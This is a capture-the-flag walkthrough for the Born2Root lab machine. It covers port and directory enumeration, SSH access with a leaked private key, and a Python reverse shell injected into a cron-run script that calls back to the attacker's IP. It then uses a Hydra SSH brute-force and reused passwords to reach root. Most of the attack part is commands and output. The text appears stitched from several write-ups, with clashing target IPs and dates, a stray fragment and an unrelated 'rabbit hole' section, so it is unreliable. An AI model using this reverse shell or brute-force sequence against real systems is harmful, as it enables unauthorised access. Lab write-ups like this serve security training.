Exploitation Guide for Born2Root
Summary
Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.
Enumeration
Nmap
We initiate our enumeration of the target by launching two nmap
scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.
kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39832/tcp6 status
| 100024 1 47504/udp status
| 100024 1 50443/udp6 status
|_ 100024 1 52205/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information.
We should take note of the username martin
that appears twice on this page: in the About Us section and in the Contact Us section.
GoBuster
We will use GoBuster
to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.
kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...
Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.
kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
Exploitation
Local SSH Access
Let’s give this key proper permissions and then use it to SSH as martin
(we can just hit enter when prompted for secret password
).
kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born
...
READY TO ACCESS THE SECRET LAB ?
secret password :
WELCOME !
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)
Escalation
Local Enumeration
Checking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy
.
martin@debian:~$ cat /etc/cron*
...
*/5 * * * * jimmy python /tmp/sekurity.py
Reverse Shell
We can copy a Python reverse shell into the sekurity.py file chmod+x sekurity.py and wait 5 minutes for the cronjob to be executed.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.
After a few minutes, we catch our shell:
kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$
SSH Login Brute-Force
Let’s check /etc/passwd to get a list of available users on the system:
jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash
The user Hadi
stands out as another user also mentioned on the company website.
kali@kali:~$
cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt
I then used the text file with Hydra to bruteforce SSH which actually worked.
Now we can try brute-forcing the password for the user hadi
using Hydra
:
kali@kali:~$ hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52 login: hadi password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26
We find that the password is hadi123
, and now we simply switch from our current user to hadi
with the recovered password:
jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Escalation to Root
The password for root
was re-used and is the same as hadi
‘s: hadi123
.
hadi@debian:~$ su -
Password:
root@debian:~# whoami
root
explained
root@debian:/var/spool/cron# cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */5 * * * * jimmy python /tmp/sekurity.py root@debian:/var/spool/cron#
THE RABBIT HOLE
The networker
binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about go try and deal with that.
Instead, I’m going to go back to my OSCP training
kali@kali:~$ sudo nc -nlvp 80
Password:
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$
.